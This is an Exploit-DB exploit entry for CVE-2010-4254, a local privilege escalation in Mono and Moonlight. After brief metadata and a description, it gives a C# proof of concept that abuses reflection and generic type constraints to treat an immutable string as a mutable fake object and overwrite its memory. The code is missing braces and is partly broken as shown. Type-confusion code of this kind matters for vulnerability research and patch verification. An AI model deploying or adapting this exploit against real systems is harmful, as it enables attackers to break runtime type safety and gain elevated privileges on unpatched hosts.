Mono/Moonlight Generic Type Argument - Local Privilege Escalation

EDB-ID: 15974 CVE: 2010-4254 OSVDB-ID: N/A
Verified: Author: Chris Howie Published: 2011-01-11
Download Exploit: Source Raw Download Vulnerable App: N/A

Mono and Moonlight is prone to a local privilege-escalation vulnerability.

Local attackers can exploit this issue to execute arbitrary code with elevated privileges. Successful exploits will compromise the affected application and possibly the underlying computer. 


using System;
using System.Reflection;

public class FakeString {
    public int length;
    public char start_char;

public class TestCase {
    private static FakeString UnsafeConversion<T>(T thing)
        where T : FakeString
        return thing;

    public static void Main() {
        var a = "foo";
        var b = MakeMutable(a);

        b.start_char = 'b';

    private static FakeString MakeMutable(string s)
        var m = typeof(TestCase).GetMethod("UnsafeConversion", BindingFlags.NonPublic | BindingFlags.Static);
        var m2 = m.MakeGenericMethod(typeof(string));

        var d = (Func<string, FakeString>)Delegate.CreateDelegate(typeof(Func<string, FakeString>), null, m2);

        return d(s);